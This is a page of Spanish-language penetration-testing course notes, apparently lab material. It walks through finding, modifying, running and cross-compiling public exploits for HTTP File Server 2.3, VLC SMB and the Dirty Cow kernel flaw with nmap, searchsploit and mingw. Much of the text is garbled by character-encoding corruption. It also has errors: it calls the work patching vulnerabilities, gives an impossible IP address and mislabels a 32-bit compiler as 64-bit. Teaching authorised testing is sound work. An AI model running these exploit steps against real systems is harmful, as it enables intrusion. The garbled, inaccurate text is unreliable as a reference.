Fixing Exploits

Fixing Exploits

Fixing Exploits consiste en analizar el c贸digo del exploit y realizar pruebas para identificar vulnerabilidades. Tambi茅n involucra aplicar parches o modificaciones necesarias para eliminar dichas vulnerabilidades y asegurar que el sistema no pueda ser comprometido en el futuro.

Demo: Fixing Exploits

Este demo muestra c贸mo buscar y modificar un exploit para corregir vulnerabilidades. A continuaci贸n, se detallan los pasos:

  1. Escanear el sistema objetivo con Nmap:

    nmap -sv 10.4.23.75

    Esto identificar谩 los servicios y versiones ejecutados en la direcci贸n IP especificada.

  2. Buscar exploits conocidos con SearchSploit:

    searchsploit HTTP File Server 2.3
searchsploit -m 39161

    Utilice SearchSploit para encontrar exploits asociados con la versi贸n del servicio identificado. El comando -m 39161 extrae una copia del exploit para su modificaci贸n.

  3. Modificar el archivo del exploit: Abra el archivo descargado (39161.py) en un editor de texto para ajustarlo seg煤n sea necesario:

    vim 39161.py

    Edite las variables ip_addr y local_port con los valores correctos para su entorno:

    ip_addr = "10.10.0.1234"  # Direcci贸n IP local
local_port = 80          # N煤mero de puerto local

  4. Ejecutar el exploit modificado: Revise los requisitos adicionales necesarios y ejecute el exploit:

    python 39161.py 10.4.23.75 80

    Aseg煤rese de ajustar cualquier otra configuraci贸n requerida para que el script funcione correctamente y pruebe que la vulnerabilidad ha sido corregida.

Quiz: Fixing Exploits

Cross-Compiling Exploits

En algunos casos, el c贸digo de explotaci贸n se desarrollar谩 en C/C++/C#, por lo que deber谩 compilarlo en un archivo ejecutable port谩til (PE) o binario.

La compilaci贸n cruzada es el proceso de compilar c贸digo para una plataforma distinta a la que realiza la compilaci贸n.

Como evaluador de penetraci贸n, deber谩 tener las habilidades necesarias para compilar el c贸digo de explotaci贸n desarrollado en C.

Demo: Cross-Compiling Exploits

sudo apt-get install mingw-w64

# mingw-w64 se utiliza para la compilaci贸n cruzada de programas de C/C++ para Windows en sistemas Linux.

searchsploit VideoLAN VLC SMB

searchsploit -m 9303
# el script del exploit puede traer consigo una descripci贸n de c贸mo se compila el c贸digo
# y los argumentos que se deben de utilizar

# compilar para win 64
i686-w64-mingw32-gcc 9303.c -o exploit
$ ls
exploit.exe
9303.c

# compilar para win 32
i686-w64-mingw32-gcc 9303.c -o exploit -lws2_32

# otro ejemplo
searchsploit Dirty Cow
searchsploit -m 40839

# compilaci贸n
gcc -pthread 40839.c -o exploit -lcrypt

Existen exploits de binarios de Windows y Linux, en donde ya tienen la compilaci贸n cruzada y est谩n funcionando de forma correcta.

LogoGitHub - offensive-security/exploitdb-bin-sploits: The legacy Exploit Database repository - New repo located at https://gitlab.com/exploit-database/exploitdb-bin-sploitsGitHub

Quiz: Cross-Compiling Exploits

PreviousSearching For ExploitsNextShells

Last updated